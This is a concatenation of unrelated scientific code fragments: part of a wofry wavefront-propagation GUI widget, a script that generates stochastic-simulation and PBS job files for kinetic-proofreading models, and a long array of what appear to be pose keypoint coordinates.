labelWidth=260, valueType=float, orientation="horizontal")
oasysgui.lineEdit(self.zoom_scaled_box_2, self, "scaled_N", "Number of points for guessing curvature",
labelWidth=260, valueType=int, orientation="horizontal")
self.set_Propagator()
def set_Propagator(self):
self.fresnel_box.setVisible(self.propagator <= 1)
self.fraunhofer_box.setVisible(self.propagator == 2)
self.integral_box.setVisible(self.propagator == 3)
self.zoom_box.setVisible(self.propagator == 4)
self.zoom_scaled_box.setVisible(self.propagator == 5)
if self.propagator == 5: self.set_ScaledGuess()
def set_ScaledGuess(self):
self.zoom_scaled_box_1.setVisible(self.scaled_guess_R==0)
self.zoom_scaled_box_2.setVisible(self.scaled_guess_R==1)
def draw_specific_box(self):
pass
def check_data(self):
congruence.checkNumber(self.p, "Distance from previous Continuation Plane")
congruence.checkNumber(self.q, "Distance to next Continuation Plane")
congruence.checkAngle(self.angle_radial, "Incident Angle (to normal)")
congruence.checkAngle(self.angle_azimuthal, "Rotation along Beam Axis")
def propagate_wavefront(self):
self.progressBarInit()
self.wofry_output.setText("")
sys.stdout = EmittingStream(textWritten=self.writeStdOut)
if self.input_data is None: raise Exception("No Input Data")
self.check_data()
# propagation to o.e.
input_wavefront = self.input_data.get_wavefront()
beamline = self.input_data.get_beamline().duplicate()
optical_element = self.get_optical_element()
optical_element.name = self.oe_name if not self.oe_name is None else self.windowTitle()
beamline_element = BeamlineElement(optical_element=optical_element,
coordinates=ElementCoordinates(p=self.p,
q=self.q,
angle_radial=numpy.radians(self.angle_radial),
angle_azimuthal=numpy.radians(self.angle_azimuthal)))
#
# this will store the propagation parameters in beamline in order to perform the propagation in the script
#
# 1D
# ==
#
# propagators_list = ["Fresnel", "Fresnel (Convolution)", "Fraunhofer", "Integral", "Fresnel Zoom", "Fresnel Zoom Scaled"]
# class_name = ["Fresnel1D", "FresnelConvolution1D", "Fraunhofer1D", "Integral1D", "FresnelZoom1D", "FresnelZoomScaling1D"]
# handler_name = ["FRESNEL_1D", "FRESNEL_CONVOLUTION_1D", "FRAUNHOFER_1D", "INTEGRAL_1D", "FRESNEL_ZOOM_1D", "FRESNEL_ZOOM_SCALING_1D"]
if self.propagator == 0:
propagator_info = {
"propagator_class_name": "Fresnel",
"propagator_handler_name": self.get_handler_name(),
"propagator_additional_parameters_names": [],
"propagator_additional_parameters_values": []}
elif self.propagator == 1:
propagator_info = {
"propagator_class_name": "FresnelConvolution1D",
"propagator_handler_name": self.get_handler_name(),
"propagator_additional_parameters_names": [],
"propagator_additional_parameters_values": []}
elif self.propagator == 2:
propagator_info = {
"propagator_class_name": "Fraunhofer1D",
"propagator_handler_name": self.get_handler_name(),
"propagator_additional_parameters_names": [],
"propagator_additional_parameters_values": []}
elif self.propagator == 3:
propagator_info = {
"propagator_class_name": "Integral1D",
"propagator_handler_name": self.get_handler_name(),
"propagator_additional_parameters_names": ['magnification_x', 'magnification_N'],
"propagator_additional_parameters_values": [self.magnification_x, self.magnification_N]}
elif self.propagator == 4:
propagator_info = {
"propagator_class_name": "FresnelZoom1D",
"propagator_handler_name": self.get_handler_name(),
"propagator_additional_parameters_names": ['magnification_x'],
"propagator_additional_parameters_values": [self.magnification_x]}
elif self.propagator == 5:
propagator_info = {
"propagator_class_name": "FresnelZoomScaling1D",
"propagator_handler_name": self.get_handler_name(),
"propagator_additional_parameters_names": ['magnification_x','radius'],
"propagator_additional_parameters_values": [self.magnification_x, self.wavefront_radius]}
beamline.append_beamline_element(beamline_element, propagator_info)
propagation_elements = PropagationElements()
propagation_elements.add_beamline_element(beamline_element)
propagation_parameters = PropagationParameters(wavefront=input_wavefront.duplicate(),
propagation_elements=propagation_elements)
self.set_additional_parameters(propagation_parameters)
self.setStatusMessage("Begin Propagation")
propagator = PropagationManager.Instance()
output_wavefront = propagator.do_propagation(propagation_parameters=propagation_parameters,
handler_name=self.get_handler_name())
self.setStatusMessage("Propagation Completed")
self.wavefront_to_plot = output_wavefront
if self.view_type > 0:
self.initializeTabs()
self.do_plot_results()
else:
self.progressBarFinished()
self.send("WofryData", WofryData(beamline=beamline, wavefront=output_wavefront))
self.send("Trigger", TriggerIn(new_object=True))
# try:
if True:
self.wofry_python_script.set_code(beamline.to_python_code())
# except:
# pass
self.setStatusMessage("")
try:
self.print_intensities()
except:
pass
def print_intensities(self):
input_wavefront = self.input_data.get_wavefront()
output_wavefront = self.wavefront_to_plot
c1 = input_wavefront.get_intensity().sum()
c2 = output_wavefront.get_intensity().sum()
d1 = input_wavefront.delta()
d2 = output_wavefront.delta()
i1 = c1 * d1
i2 = c2 * d2
print("\n\n\n ========== integrated intensities: ")
print("input wavefront integrated intensity: %g, counts: %g" % (i1, c1))
print("output wavefront integrated intensity: %g, counts: %g" % (i2, c2))
print("output/input intensity ratio (transmission): %g " % (i2 / i1))
print("(input-output)/input intensity ratio (absorption): %g " % ((i1 - i2) / i1))
print("abscissas step in: %g um, out: %g um" % (1e6 * d1, 1e6 * d2))
def get_handler_name(self):
if self.propagator == 0:
return Fresnel1D.HANDLER_NAME
elif self.propagator == 1:
return FresnelConvolution1D.HANDLER_NAME
elif self.propagator == 2:
return Fraunhofer1D.HANDLER_NAME
elif self.propagator == 3:
return Integral1D.HANDLER_NAME
elif self.propagator == 4:
return FresnelZoom1D.HANDLER_NAME
elif self.propagator == 5:
return FresnelZoomScaling1D.HANDLER_NAME
def set_additional_parameters(self, propagation_parameters):
if self.propagator <= 2:
pass
elif self.propagator == 3:
propagation_parameters.set_additional_parameters("magnification_x", self.magnification_x)
propagation_parameters.set_additional_parameters("magnification_N", self.magnification_N)
elif self.propagator == 4:
propagation_parameters.set_additional_parameters("magnification_x", self.magnification_x)
elif self.propagator == 5:
propagation_parameters.set_additional_parameters("magnification_x", self.magnification_x)
if self.scaled_guess_R:
# from srxraylib.plot.gol import plot
# radii,fig_of_mer = self.input_wavefront.scan_wavefront_curvature(
# rmin=-self.scaled_Rmax,rmax=self.scaled_Rmax,rpoints=self.scaled_N)
# plot(radii,fig_of_mer)
self.wavefront_radius = self.input_data.get_wavefront().guess_wavefront_curvature(
rmin=-self.scaled_Rmax,rmax=self.scaled_Rmax,rpoints=self.scaled_N)
print("Guess wavefront curvature radius: %f m " % self.wavefront_radius)
else:
self.wavefront_radius = self.scaled_R
propagation_parameters.set_additional_parameters("radius", self.wavefront_radius)
def get_optical_element(self):
raise NotImplementedError()
def set_input(self, wofry_data):
if not wofry_data is None:
if isinstance(wofry_data, WofryData):
self.input_data = wofry_data
else:
raise Exception("Only wofry_data allowed as input")
if self.is_automatic_execution:
self.propagate_wavefront()
def get_titles(self):
return ["Wavefront 1D Intensity",
"Wavefront 1D Phase",
"Wavefront Real(Amplitude)",
"Wavefront Imag(Amplitude)"]
def initializeTabs(self):
size = len(self.tab)
indexes = range(0, size)
for index in indexes:
self.tabs.removeTab(size-1-index)
self.tab = []
self.plot_canvas = []
for index in range(0, len(self.get_titles())):
self.tab.append(gui.createTabPage(self.tabs, self.get_titles()[index]))
self.plot_canvas.append(None)
for tab in self.tab:
tab.setFixedHeight(self.IMAGE_HEIGHT)
tab.setFixedWidth(self.IMAGE_WIDTH)
def do_plot_results(self, progressBarValue=80, closeProgressBar=True):
if not self.wavefront_to_plot is None:
self.progressBarSet(progressBarValue)
self.plot_data1D(x=1e6*self.wavefront_to_plot.get_abscissas(),
y=self.wavefront_to_plot.get_intensity(),
progressBarValue=progressBarValue,
tabs_canvas_index=0,
plot_canvas_index=0,
title=self.get_titles()[0],
xtitle="Spatial Coordinate [$\mu$m]",
ytitle="Intensity")
self.plot_data1D(x=1e6*self.wavefront_to_plot.get_abscissas(),
y=self.wavefront_to_plot.get_phase(from_minimum_intensity=0.1,unwrap=1),
progressBarValue=progressBarValue + 10,
tabs_canvas_index=1,
plot_canvas_index=1,
title=self.get_titles()[1],
xtitle="Spatial Coordinate [$\mu$m]",
ytitle="Phase [unwrapped, for intensity > 10% of peak] (rad)")
self.plot_data1D(x=1e6*self.wavefront_to_plot.get_abscissas(),
y=numpy.real(self.wavefront_to_plot.get_complex_amplitude()),
progressBarValue=progressBarValue + 10,
tabs_canvas_index=2,
plot_canvas_index=2,
title=self.get_titles()[2],
xtitle="Spatial Coordinate [$\mu$m]",
ytitle="Real(Amplitude)")
self.plot_data1D(x=1e6*self.wavefront_to_plot.get_abscissas(),
y=numpy.imag(self.wavefront_to_plot.get_complex_amplitude()),
progressBarValue=progressBarValue + 10,
tabs_canvas_index=3,
plot_canvas_index=3,
title=self.get_titles()[3],
xtitle="Spatial Coordinate [$\mu$m]",
ytitle="Imag(Amplitude)")
# for i in range(len(self.get_titles())):
# self.plot_canvas[i].resetZoom()
if closeProgressBar: self.progressBarFinished()
def receive_syned_data(self, data):
if not data is None:
beamline_element = data.get_beamline_element_at(-1)
if not beamline_element is None:
self.oe_name = beamline_element._optical_element._name
self.p = beamline_element._coordinates._p
self.q = beamline_element._coordinates._q
self.angle_azimuthal = round(numpy.degrees(beamline_element._coordinates._angle_azimuthal), 6)
self.angle_radial = round(numpy.degrees(beamline_element._coordinates._angle_radial), 6)
self.receive_specific_syned_data(beamline_element._optical_element)
else:
raise Exception("Syned Data not correct: Empty Beamline Element")
def receive_specific_syned_data(self, optical_element):
raise NotImplementedError()
def callResetSettings(self):
if ConfirmDialog.confirmed(parent=self, message="Confirm Reset of the Fields?"):
| |
<filename>unorganized_code/two_species.py
#!/usr/bin/python
import argparse
import datetime
import os
import subprocess
import numpy as np
from simulation_parameters import DefineRegion
class SharedCommands(object):
def __init__(self, n_initial, record):
self.n_initial = n_initial
self.record = record
def initialize(self, f):
for key, value in self.n_initial.items():
f.write("new {0} at {1}\n".format(key, value))
def record_species(self, f):
for item in self.record:
f.write("record {0}\n".format(item))
f.write("\n")
def compile_script(script_name):
subprocess.call(["ssc", "--save-expanded=network", "{0}".format(script_name)])
class TwoSpecies(object):
def __init__(self):
self.k_AB = 0.1
self.k_BA = 0.2
self.species = {"A": [self.k_AB, "B"], "B": [self.k_BA, "A"]}
self.n_initial = {"A": 800, "B": 200}
self.record = ["A", "B"]
self.script_name = "two_species_A_B.rxn"
self.shared = SharedCommands(self.n_initial, self.record)
self.regions = DefineRegion()
self.simulation_name = "two_species_A_B"
self.num_files = 50
self.run_time = 100
self.time_step = 0.1
def define_rxns(self, f):
for key, value in self.species.items():
f.write("rxn x:{0} at {1} -> destroy x; new {2}\n".format(key, value[0], value[1]))
f.write("\n")
def generate_script(self):
f = open(self.script_name, "w")
self.regions.define_region(f)
self.define_rxns(f)
self.shared.initialize(f)
self.shared.record_species(f)
f.close()
def generate_qsub(self):
q = open("qsub.sh", "w")
q.write("#PBS -m ae\n")
q.write("#PBS -q short\n")
q.write("#PBS -V\n")
q.write("#PBS -l walltime=00:02:00,nodes=1:ppn=1 -N {0}\n\n".format(self.simulation_name))
q.write("cd $PBS_O_WORKDIR\n\n")
q.write("EXE_FILE={0}\n".format(self.simulation_name))
q.write("RUN_TIME={0}\n".format(self.run_time))
q.write("STEP={0}\n\n".format(self.time_step))
q.write("for j in {1.." + str(self.num_files) + "}\n")
q.write("do\n")
q.write("\t ./$EXE_FILE -e $RUN_TIME -t $STEP > traj_$j\n")
q.write("done\n")
q.write("wait \n")
q.write("python ~/SSC_python_modules/post_process.py --run_time $RUN_TIME --time_step $STEP\n")
class TwoWay(object):
def __init__(self):
self.dictionary = {}
def add(self, key, value):
self.dictionary[key] = value
self.dictionary[value] = key
class KPBindingParameters(object):
def __init__(self):
self.k_tcr_on = 0.0052
self.k_foreign_off = 0.2
self.k_self_off = 10.0 * self.k_foreign_off
self.k_p = 0.05
self.k_p_off_foreign = 0.5
self.k_p_off_self = 10.0 * self.k_p_off_foreign
class SelfWithForeign(object):
def __init__(self, arguments=None):
self.arguments = arguments
self.rate_constants = KPBindingParameters()
self.n_initial = {"R": 10000, "Lf": 20, "Ls": 0}
self.record = ["Lf", "Ls", "C0", "D0"]
self.simulation_name = "kp_competing"
self.forward_rates = {"RLf": self.rate_constants.k_tcr_on, "RLs": self.rate_constants.k_tcr_on}
self.reverse_rates = {"C0": self.rate_constants.k_foreign_off, "D0": self.rate_constants.k_self_off}
self.forward_rxns = [[["R", "Lf"], ["C0"]], [["R", "Ls"], ["D0"]]]
self.reverse_rxns = [[["C0"], ["R", "Lf"]], [["D0"], ["R", "Ls"]]]
self.num_kp_steps = 1
self.num_samples = 0
if self.arguments:
if self.arguments.test or self.arguments.ss:
self.num_samples = 1
else:
self.num_samples = 1000
self.mu = 6
self.sigma = 1.0
self.p_ligand = [int(i) for i in np.round(np.random.lognormal(self.mu, self.sigma, self.num_samples))]
self.output = ["C", "D"]
def change_ligand_concentration(self, concentration):
self.n_initial["Ls"] = concentration
def modify_forward_reverse(self, reactants, products, forward_rate, reverse_rate):
self.forward_rates[''.join(reactants)] = forward_rate
self.forward_rxns.append([reactants, products])
self.reverse_rates[''.join(products)] = reverse_rate
self.reverse_rxns.append([products, reactants])
self.record.append(''.join(products))
def increment_step(self):
self.num_kp_steps += 1
self.simulation_name = "kp_steps_" + str(self.num_kp_steps)
print("Num KP steps = " + str(self.num_kp_steps))
def add_step_1(self):
self.increment_step()
for i in self.output:
if i == "C":
k_p_off = self.rate_constants.k_p_off_foreign
elif i == "D":
k_p_off = self.rate_constants.k_p_off_self
self.modify_forward_reverse([i + "0"], [i + "1"], self.rate_constants.k_p, k_p_off)
def add_step_2(self):
self.increment_step()
for i in self.output:
if i == "C":
k_p_off = self.rate_constants.k_p_off_foreign
elif i == "D":
k_p_off = self.rate_constants.k_p_off_self
self.modify_forward_reverse([i + "1"], [i + "2"], self.rate_constants.k_p, k_p_off)
def add_step_3(self):
self.increment_step()
for i in self.output:
if i == "C":
k_p_off = self.rate_constants.k_p_off_foreign
elif i == "D":
k_p_off = self.rate_constants.k_p_off_self
self.modify_forward_reverse([i + "2"], [i + "3"], self.rate_constants.k_p, k_p_off)
class ReversibleSelfLigand(SelfWithForeign):
def __init__(self):
SelfWithForeign.__init__(self)
del self.n_initial['Lf']
self.n_initial = {"R": 10000, "Ls": 0}
self.record = ["Ls", "D0"]
self.simulation_name = "kp_ls"
self.forward_rates = {"RLs": self.rate_constants.k_tcr_on}
self.reverse_rates = {"D0": self.rate_constants.k_self_off}
self.forward_rxns = [[["R", "Ls"], ["D0"]]]
self.reverse_rxns = [[["D0"], ["R", "Ls"]]]
self.output = ["D"]
class ForeignLigand(object):
def __init__(self, arguments=None):
self.arguments = arguments
self.rate_constants = KPBindingParameters()
self.inputs = ["R", "Lf"]
self.n_initial = {"R": 10000, "Lf": 0}
self.record = ["Lf", "C0"]
self.simulation_name = "kp_lf"
self.forward_rates = {"RLf": self.rate_constants.k_tcr_on}
self.reverse_rates = {"C0": self.rate_constants.k_foreign_off}
self.forward_rxns = [[["R", "Lf"], ["C0"]]]
self.reverse_rxns = [[["C0"], ["R", "Lf"]]]
self.symbol = "C"
self.num_kp_steps = 1
self.num_samples = 0
if self.arguments:
if self.arguments.test or self.arguments.ss:
self.num_samples = 5
else:
self.num_samples = 1000
self.mu = 20
self.sigma = 0.5
self.p_ligand = [int(i) for i in np.round(np.random.normal(self.mu, self.sigma, self.num_samples))]
def change_ligand_concentration(self, concentration):
self.n_initial["Lf"] = concentration
class SelfLigand(object):
def __init__(self, arguments=None):
self.arguments = arguments
self.rate_constants = KPBindingParameters()
self.inputs = ["R", "Ls"]
self.n_initial = {"R": 10000, "Ls": 0}
self.record = ["Ls", "D0"]
self.simulation_name = "kp_ls"
self.forward_rates = {"RLs": self.rate_constants.k_tcr_on}
self.reverse_rates = {"D0": self.rate_constants.k_self_off}
self.forward_rxns = [[["R", "Ls"], ["D0"]]]
self.reverse_rxns = [[["D0"], ["R", "Ls"]]]
self.symbol = "D"
self.num_kp_steps = 1
if self.arguments:
if self.arguments.test or self.arguments.ss:
self.num_samples = 5
else:
self.num_samples = 1000
self.mu = 6
self.sigma = 1.0
self.p_ligand = [int(i) for i in np.round(np.random.lognormal(self.mu, self.sigma, self.num_samples))]
def change_ligand_concentration(self, concentration):
self.n_initial["Ls"] = concentration
def add_to_network(n, reactants, products, rate):
n.write(" + ".join(reactants))
n.write(" -> {0} ".format(rate))
n.write(" + ".join(products))
n.write("\n")
class KPSingleSpecies(object):
def __init__(self, foreign=False, self_foreign=False, arguments=None):
self.foreign_flag = foreign
self.self_foreign_flag = self_foreign
self.arguments = arguments
self.regions = DefineRegion()
if self.foreign_flag:
self.ligand = ForeignLigand()
elif self.self_foreign_flag:
self.ligand = SelfWithForeign()
else:
self.ligand = ReversibleSelfLigand()
self.num_files = 100
self.run_time = 100
self.simulation_time = 2
self.single_molecule = False
self.home_directory = os.getcwd()
self.num_kp_steps = 1
def set_simulation_time(self, ls=500):
if ls < 500:
simulation_time = 4.0
else:
simulation_time = self.run_time * (20.0 / 1000)
return simulation_time
def set_time_step(self):
if self.arguments:
if self.arguments.ss:
time_step = 1.0
else:
time_step = self.run_time
else:
time_step = self.run_time
return time_step
@staticmethod
def define_reactions(f, rxn, rate, n):
for i in range(len(rxn)):
input_string = "rxn "
destroy_string = ""
input = rxn[i][0]
output = rxn[i][1]
rate_key = ""
for item in input:
input_string += "{0}:{1} ".format(item.lower(), item)
destroy_string += "destroy {0}; ".format(item.lower())
rate_key += item
rate_key += "_"
output_string = ""
for item in output:
output_string += "new {0}; ".format(item)
rate_key += item
rate_string = "at {0} -> ".format(rate[rate_key])
f.write(input_string + rate_string + destroy_string + output_string + "\n")
add_to_network(n, input, output, rate[rate_key])
def generate_ssc_script(self, simulation_name):
script_name = simulation_name + ".rxn"
shared = SharedCommands(self.ligand.n_initial, self.ligand.record)
f = open(script_name, "w")
n = open("ordered_network", "w")
self.regions.define_region(f)
f.write("-- Forward reactions \n")
n.write("# Forward Reactions \n")
self.define_reactions(f, self.ligand.forward_rxns, self.ligand.forward_rates, n)
n.write("\n# Reverse Reactions \n")
f.write("\n-- Reverse reactions \n")
self.define_reactions(f, self.ligand.reverse_rxns, self.ligand.reverse_rates, n)
f.write("\n")
shared.initialize(f)
f.write("\n")
shared.record_species(f)
n.close()
f.close()
def generate_qsub(self, simulation_name, time_step, ls=500):
q = open("qsub.sh", "w")
q.write("#PBS -m ae\n")
q.write("#PBS -q short\n")
q.write("#PBS -V\n")
q.write("#PBS -l walltime={1},nodes=1:ppn=1 -N {0}\n\n".format(simulation_name,
datetime.timedelta(
minutes=self.set_simulation_time(ls=ls))))
q.write("cd $PBS_O_WORKDIR\n\n")
q.write("echo $PBS_JOBID > job_id\n")
q.write("EXE_FILE={0}\n".format(simulation_name))
q.write("RUN_TIME={0}\n".format(self.run_time))
q.write("STEP={0}\n\n".format(time_step))
q.write("for j in {1.." + str(self.num_files) + "}\n")
q.write("do\n")
if time_step == self.run_time:
q.write("\t ./$EXE_FILE -e $RUN_TIME > traj_$j\n")
else:
q.write("\t ./$EXE_FILE -e $RUN_TIME -t $STEP > traj_$j\n")
q.write("done\n\n")
q.write("python ~/SSC_python_modules/post_process.py --num_files {0} "
"--run_time $RUN_TIME --time_step $STEP\n".format(self.num_files))
if self.single_molecule:
q.write("wait \n")
q.write("python ~/SSC_python_modules/kp_sm_post_process.py \n")
if self.arguments.ss:
q.write("python ~/SSC_python_modules/plot.py \n")
q.close()
def generate(self, simulation_name, time_step, ls=500):
self.generate_ssc_script(simulation_name)
compile_script(simulation_name + ".rxn")
self.generate_qsub(simulation_name, time_step, ls=ls)
def single_add_step(self):
self.num_kp_steps += 1
self.ligand.simulation_name = "kp_steps_" + str(self.num_kp_steps)
print("Num KP steps = " + str(self.num_kp_steps))
self.ligand.forward_rates[
self.ligand.symbol + "{0}".format(self.num_kp_steps - 2)] = self.ligand.rate_constants.k_p
self.ligand.forward_rxns.append([[self.ligand.symbol + "{0}".format(self.num_kp_steps - 2)],
[self.ligand.symbol + "{0}".format(self.num_kp_steps - 1)]])
self.ligand.reverse_rates[self.ligand.symbol + "{0}".format(self.num_kp_steps - 1)] = self.ligand.reverse_rates[
self.ligand.symbol + "0"]
self.ligand.reverse_rxns.append(
[[self.ligand.symbol + "{0}".format(self.num_kp_steps - 1)], self.ligand.inputs])
self.ligand.record.append(self.ligand.symbol + "{0}".format(self.num_kp_steps - 1))
def competing_add_step(self):
self.num_kp_steps += 1
self.ligand.simulation_name = "kp_steps_" + str(self.num_kp_steps)
print("Num KP steps = " + str(self.num_kp_steps))
for i in ["C", "D"]:
self.ligand.forward_rates[i + "{0}".format(self.num_kp_steps - 2)] = self.ligand.rate_constants.k_p
self.ligand.forward_rxns.append([[i + "{0}".format(self.num_kp_steps - 2)],
[i + "{0}".format(self.num_kp_steps - 1)]])
if i == "C":
self.ligand.reverse_rates[
i + "{0}".format(self.num_kp_steps - 1)] = self.ligand.rate_constants.k_foreign_off
self.ligand.reverse_rxns.append([[i + "{0}".format(self.num_kp_steps - 1)], ["R", "Lf"]])
elif i == "D":
self.ligand.reverse_rates[
i + "{0}".format(self.num_kp_steps - 1)] = self.ligand.rate_constants.k_self_off
self.ligand.reverse_rxns.append([[i + "{0}".format(self.num_kp_steps - 1)], ["R", "Ls"]])
self.ligand.record.append(i + "{0}".format(self.num_kp_steps - 1))
def add_step(self):
if self.self_foreign_flag:
self.competing_add_step()
else:
self.single_add_step()
def main_script(self, run=False):
sample = []
for i in range(self.ligand.num_samples):
directory = "sample_" + str(i)
s = self.ligand.p_ligand[i]
sample.append(s)
self.ligand.change_ligand_concentration(s)
simulation_name = self.ligand.simulation_name + "_" + str(i)
os.makedirs(directory)
print("Made " + directory)
os.chdir(directory)
print("Changed into directory: " + str(os.getcwd()))
if self.ligand.num_kp_steps > 6:
self.run_time = 1000
self.generate(simulation_name, self.set_time_step())
if run:
(stdout, stderr) = subprocess.Popen(["qsub {0}".format("qsub.sh")], shell=True, stdout=subprocess.PIPE,
cwd=os.getcwd()).communicate()
os.chdir(self.home_directory)
np.savetxt("Ligand_concentrations", sample, fmt='%f')
np.savetxt("Ligand_concentrations_sorted", np.sort(sample), fmt='%f')
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Submitting job for calculating P(C0) as function of steps",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--run', action='store_true', default=False,
help='Flag for submitting simulations.')
parser.add_argument('--test', action='store_true', default=False,
help="flag for testing.")
parser.add_argument('--ss', action='store_true', default=False,
help="flag for checking if sims approach steady-state.")
args = parser.parse_args()
two_species = TwoSpecies()
two_species.generate_script()
compile_script(two_species.script_name)
two_species.generate_qsub()
# if "Ls_Lf" in os.getcwd():
# kp = KPSingleSpecies(self_foreign=True, arguments=args)
# elif "Lf" in os.getcwd():
# kp = KPSingleSpecies(foreign=True, arguments=args)
# elif "Ls" in os.getcwd():
# kp = KPSingleSpecies()
# else:
# raise Exception("Incorrect Directory labeling. Specify (Ls, | |
],
[
708,
676,
73,
708,
676,
29,
708,
676,
-3,
728,
552,
48,
721,
409,
24,
689,
405,
7,
656,
402,
22,
634,
539,
47,
556,
662,
-6,
556,
662,
21,
556,
662,
51,
693,
305,
18,
697,
204,
43,
701,
104,
62,
638,
194,
16,
559,
277,
4,
558,
308,
-7,
558,
308,
-21,
757,
213,
26,
757,
313,
34,
726,
380,
37,
726,
380,
29,
697,
204,
86
],
[
708,
677,
73,
708,
677,
29,
708,
677,
-3,
720,
549,
48,
710,
402,
24,
677,
400,
7,
644,
397,
22,
635,
552,
47,
555,
664,
-6,
555,
664,
21,
555,
664,
51,
690,
300,
18,
703,
200,
43,
716,
101,
62,
643,
188,
16,
554,
253,
4,
459,
207,
-7,
459,
207,
-21,
762,
213,
26,
746,
311,
34,
721,
339,
37,
721,
339,
29,
703,
200,
86
],
[
707,
652,
73,
707,
652,
29,
707,
652,
-3,
700,
519,
48,
711,
389,
24,
676,
385,
7,
641,
381,
22,
615,
522,
47,
538,
645,
-6,
538,
645,
21,
538,
645,
51,
685,
282,
18,
694,
179,
43,
703,
79,
62,
640,
169,
16,
561,
206,
4,
526,
178,
-7,
526,
178,
-21,
748,
190,
26,
751,
282,
34,
702,
258,
37,
702,
258,
29,
694,
179,
86
],
[
705,
647,
73,
705,
647,
29,
705,
647,
-3,
699,
518,
48,
702,
382,
24,
667,
378,
7,
633,
373,
22,
592,
512,
47,
522,
644,
-6,
522,
644,
21,
522,
644,
51,
674,
271,
18,
680,
163,
43,
686,
63,
62,
618,
153,
16,
537,
216,
4,
487,
134,
-7,
487,
134,
-21,
741,
174,
26,
748,
275,
34,
691,
212,
37,
691,
212,
29,
680,
163,
86
],
[
703,
649,
73,
703,
649,
29,
703,
649,
-3,
696,
506,
48,
687,
360,
24,
658,
358,
7,
628,
355,
22,
568,
505,
47,
536,
663,
-6,
536,
663,
21,
536,
663,
51,
665,
254,
18,
671,
150,
43,
677,
50,
62,
617,
143,
16,
546,
175,
4,
493,
118,
-7,
493,
118,
-21,
725,
157,
26,
744,
264,
34,
704,
271,
37,
704,
271,
29,
671,
150,
86
],
[
710,
657,
73,
710,
657,
29,
710,
657,
-3,
700,
516,
48,
682,
362,
24,
652,
362,
7,
621,
361,
22,
572,
516,
47,
535,
660,
-6,
535,
660,
21,
535,
660,
51,
662,
256,
18,
671,
150,
43,
680,
50,
62,
624,
148,
16,
553,
182,
4,
491,
116,
-7,
491,
116,
-21,
718,
153,
26,
729,
256,
34,
695,
268,
37,
695,
268,
29,
671,
150,
86
],
[
716,
674,
73,
716,
674,
29,
716,
674,
-3,
728,
527,
48,
703,
374,
24,
667,
374,
7,
632,
374,
22,
587,
519,
47,
535,
672,
-6,
535,
672,
21,
535,
672,
51,
663,
266,
18,
659,
157,
43,
655,
57,
62,
614,
152,
16,
552,
173,
4,
504,
109,
-7,
504,
109,
-21,
705,
162,
26,
723,
258,
34,
719,
302,
37,
719,
302,
29,
659,
157,
86
],
[
713,
674,
73,
713,
674,
29,
713,
674,
-3,
725,
533,
48,
702,
382,
24,
666,
381,
7,
630,
380,
22,
590,
532,
47,
533,
681,
-6,
533,
681,
21,
533,
681,
51,
661,
272,
18,
656,
162,
43,
651,
62,
62,
605,
155,
16,
521,
184,
4,
470,
114,
-7,
470,
114,
-21,
708,
168,
26,
732,
265,
34,
734,
325,
37,
734,
325,
29,
656,
162,
86
],
[
715,
679,
73,
715,
679,
29,
715,
679,
-3,
715,
540,
48,
683,
385,
24,
648,
383,
7,
612,
380,
22,
583,
523,
47,
548,
659,
-6,
548,
659,
21,
548,
659,
51,
653,
274,
18,
657,
164,
43,
661,
64,
62,
602,
153,
16,
480,
203,
4,
444,
121,
-7,
444,
121,
-21,
712,
175,
26,
724,
281,
34,
710,
335,
37,
710,
335,
29,
657,
164,
86
],
[
727,
659,
73,
727,
659,
29,
727,
659,
-3,
700,
507,
48,
666,
371,
24,
629,
369,
7,
591,
367,
22,
573,
501,
47,
552,
634,
-6,
552,
634,
21,
552,
634,
51,
641,
268,
18,
652,
167,
43,
663,
68,
62,
602,
155,
16,
493,
225,
4,
400,
181,
-7,
400,
181,
-21,
702,
179,
26,
705,
295,
34,
708,
392,
37,
708,
392,
29,
652,
167,
86
],
[
665,
680,
73,
665,
680,
29,
665,
680,
-3,
643,
526,
48,
645,
372,
24,
610,
371,
7,
574,
369,
22,
552,
523,
47,
560,
678,
-6,
560,
678,
21,
560,
678,
51,
621,
276,
18,
632,
181,
43,
644,
82,
62,
571,
175,
16,
521,
262,
4,
468,
268,
-7,
468,
268,
-21,
694,
187,
26,
724,
293,
34,
741,
382,
37,
741,
382,
29,
632,
181,
86
],
[
677,
659,
73,
677,
659,
29,
677,
659,
-3,
623,
529,
48,
645,
379,
24,
608,
379,
7,
571,
378,
22,
544,
523,
47,
558,
660,
-6,
558,
660,
21,
558,
660,
51,
615,
283,
18,
622,
186,
43,
629,
86,
62,
560,
183,
16,
521,
275,
4,
489,
284,
-7,
489,
284,
-21,
685,
190,
26,
733,
295,
34,
754,
376,
37,
754,
376,
29,
622,
186,
86
],
[
708,
654,
73,
708,
654,
29,
708,
654,
-3,
627,
532,
48,
648,
397,
24,
608,
391,
7,
567,
386,
22,
530,
532,
47,
549,
664,
-6,
549,
664,
21,
549,
664,
51,
609,
287,
18,
610,
183,
43,
611,
83,
62,
543,
186,
16,
521,
279,
4,
533,
307,
-7,
533,
307,
-21,
678,
179,
26,
762,
270,
34,
837,
299,
37,
837,
299,
29,
610,
183,
86
],
[
708,
654,
73,
708,
654,
29,
708,
654,
-3,
627,
532,
48,
648,
397,
24,
608,
391,
7,
567,
386,
22,
530,
532,
47,
549,
664,
-6,
549,
664,
21,
549,
664,
51,
609,
287,
18,
610,
183,
43,
611,
83,
62,
543,
186,
16,
521,
279,
4,
533,
307,
-7,
533,
307,
-21,
678,
179,
26,
762,
270,
34,
837,
299,
37,
837,
299,
29,
610,
183,
86
],
[
714,
646,
73,
714,
646,
29,
714,
646,
-3,
667,
509,
48,
655,
355,
24,
610,
353,
7,
565,
350,
22,
548,
511,
47,
549,
667,
-6,
549,
667,
21,
549,
667,
51,
614,
252,
18,
617,
150,
43,
620,
50,
62,
557,
151,
16,
538,
237,
4,
605,
199,
-7,
605,
199,
-21,
676,
150,
26,
732,
184,
34,
796,
133,
37,
796,
133,
29,
617,
150,
86
],
[
715,
645,
73,
715,
645,
29,
715,
645,
-3,
668,
506,
48,
656,
353,
24,
611,
351,
7,
566,
349,
22,
548,
508,
47,
548,
666,
-6,
548,
666,
21,
548,
666,
51,
614,
251,
18,
616,
151,
43,
618,
51,
62,
557,
151,
16,
539,
239,
4,
566,
186,
-7,
566,
186,
-21,
675,
150,
26,
733,
184,
34,
798,
134,
37,
798,
134,
29,
616,
151,
86
],
[
716,
637,
73,
716,
637,
29,
716,
637,
-3,
680,
497,
48,
654,
362,
24,
610,
360,
7,
566,
359,
22,
552,
522,
47,
